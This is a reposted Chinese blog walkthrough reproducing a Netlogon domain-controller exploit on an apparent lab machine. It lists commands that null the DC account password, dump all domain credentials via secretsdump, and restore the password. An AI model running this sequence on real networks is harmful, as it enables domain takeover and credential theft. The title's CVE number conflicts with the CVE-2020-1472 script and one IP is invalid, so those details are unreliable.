CVE-2020-1427漏洞复现

admin 2025年1月25日02:05:20评论8 views字数 988阅读3分17秒阅读模式

内网渗透-CVE-2020-1427

利用之前先检查一下密码是否为空

CVE-2020-1427漏洞复现

检测是否存在漏洞

python3 zerologon_tester.py Multimaster 10.129.44.1241 ⚙
CVE-2020-1427漏洞复现

使用poc直接置空密码

python3 CVE-2020-1472.py Multimaster 10.129.175.226
CVE-2020-1427漏洞复现

dump密码,查看是否被置空(域控的机器账户可以使用DCSync导出域内所有用户凭据)

└─# python3 secretsdump.py  Multimaster$@10.129.175.226 -no-pass -just-dc
CVE-2020-1427漏洞复现

恢复目标密码

提取机器账户的密码十六进制

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
CVE-2020-1427漏洞复现
python3 restorepassword.py  Multimaster@Multimaster -target-ip 10.129.103.84 -hexpass 75e9474feaa49a5412d9b34e2486f34495e78d51f922c8c07cf5d9474cdeedfaf8ec8a0280dab7725761216555d5def061c7f18483f6a3172bca7c05f4b2ba3fbe92df1b191ef40fa0922fe8416fc4374497af51fd27d51c58966c8bc4a79c69e0672da3c2cae47ffa9e49167da4bb9f081f6d7692e72e12cc55f214abc3f0770aa7c1e745ccf23d033eee628b77cd4007aa694ee049c708a607df3bd1e917747ec9aa8042187b14ddfb2c768b4c035e0936f95f939d4152dfa1afe3554e6a6dc640b043c654038ed61e934feaf9b2c2d631ecb328cd6dca84ffdd6b522395d6f297554acdeede65dad32177023d506b
CVE-2020-1427漏洞复现

继续使用空密码获取hash失败

CVE-2020-1427漏洞复现

查看是否被修改成功

CVE-2020-1427漏洞复现

原文始发于微信公众号(土拨鼠的安全屋):CVE-2020-1427漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月25日02:05:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2020-1427漏洞复现https://cn-sec.com/archives/3670627.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息